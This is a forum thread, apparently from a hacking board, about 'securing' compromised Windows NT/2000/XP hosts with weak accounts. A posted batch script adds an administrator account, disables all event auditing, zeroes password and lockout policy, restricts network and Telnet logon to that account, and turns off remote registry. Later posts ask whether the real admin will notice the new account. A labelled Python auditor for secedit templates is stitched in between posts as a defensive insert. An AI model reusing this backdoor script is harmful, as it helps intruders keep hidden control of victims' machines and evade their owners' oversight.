
=k3Rn=
hi !

I want to write a short batch file to secure hosts that have weak NT accounts.
Up to now I found the following registry keys, to turn off remote registry access and the automated admin shares.

In the batch you would first kill the shares (c$-x$, ipc$, admin$)
and then add the reg keys

HKEY_LOCAL_MACHINE --> System --> CurrentControlSet --> Services --> LanmanServer --> Parameters

the 2 REG_DWORDs "AutoShareServer" and "AutoShareWks" set to zero

and

echo REGEDIT4 >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RemoteRegistry\] >> root.reg
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry

What else has to be done?
Does anyone have a batch file to manage that?

greeting
=k3Rn=
LiquidIce
CODE

rem Blocks all netbios connections from all accounts except the one specified
rem secure.bat UserName Password *

@echo off
del temp
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional)  >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp

net user /add %1 %2
net localgroup administrators %1 /add
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp

del %SystemRoot%\system32\login.cmd
echo @echo off >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem  Default global login script for the Telnet Server  >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem  In the default setup, this command script is executed when the >> %SystemRoot%\system32\login.cmd
echo rem  initial command shell is invoked.  It, in turn, will try to invoke >> %SystemRoot%\system32\login.cmd
echo rem  the individual user's login script. >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd

echo if %%USERNAME%%==%1 goto good >> %SystemRoot%\system32\login.cmd
echo exit >> %SystemRoot%\system32\login.cmd
echo :good >> %SystemRoot%\system32\login.cmd

echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd
echo echo Welcome to Microsoft Telnet Server. >> %SystemRoot%\system32\login.cmd
echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd

echo cd %%HOMEDRIVE%%%HOMEPATH%% /d >> %SystemRoot%\system32\login.cmd
del temp

del root.reg
echo REGEDIT4  >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RemoteRegistry\] >> root.reg
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry
del root.reg
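
An added example, not part of the thread or any poster's code: a small Python audit of a secedit template like the one posted above. It parses the INF sections and flags settings that weaken the host, plus user rights granted to principals that are not built-in SIDs. The sample input, the account name `svc_example` and the choice of which settings to flag are assumptions of this example.

```python
import re

# Constructed sample in the secedit template format shown in the post above.
SAMPLE_INF = r"""
[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Event Audit]
AuditLogonEvents = 0
[Registry Values]
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0
[Privilege Rights]
sedebugprivilege = *S-1-5-32-544
senetworklogonright = svc_example
"""

WELL_KNOWN = re.compile(r"^\*S-1-(1-0|5-32-\d+|5-\d+)$")  # Everyone, BUILTIN\*, NT AUTHORITY\*

def parse_inf(text):
    """Return {section: {key: value}} with lower-cased section and key names."""
    sections, current = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].lower(), {})
        elif current is not None and "=" in line and not line.startswith(";"):
            key, value = line.split("=", 1)
            current[key.strip().lower()] = value.strip()
    return sections

def audit(text):
    """List reviewer findings; which settings count as weak is this example's assumption."""
    s, findings = parse_inf(text), []
    for key in ("minimumpasswordlength", "passwordcomplexity", "lockoutbadcount"):
        if s.get("system access", {}).get(key) == "0":
            findings.append(f"weak account policy: {key} = 0")
    for key, value in s.get("event audit", {}).items():
        if value == "0":
            findings.append(f"auditing disabled: {key}")
    for key, value in s.get("registry values", {}).items():
        name = key.rsplit("\\", 1)[-1]
        if name in ("restrictanonymous", "lmcompatibilitylevel") and value.split(",", 1)[-1] == "0":
            findings.append(f"legacy-permissive registry value: {name}")
    for right, holders in s.get("privilege rights", {}).items():
        for holder in filter(None, map(str.strip, holders.split(","))):
            if not WELL_KNOWN.match(holder):
                findings.append(f"{right} granted to non-built-in principal: {holder}")
    return findings
```

Pass `audit()` the text of a template file before it is applied with secedit; an empty list means none of the checked settings were flagged.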
=k3Rn=
Yeah, I know that batch file.
First question, does it only work on Win2k systems or also on Win XP?
And second, it creates a new admin account - won't the admin / user of the computer see that?
hermel
The batch file works on NT, W2K and XP.

You can add a new user with:
CODE

net user hermel myPW /add
net localgroup Administrators hermel /add


But the admin can see that a new user with admin rights is there.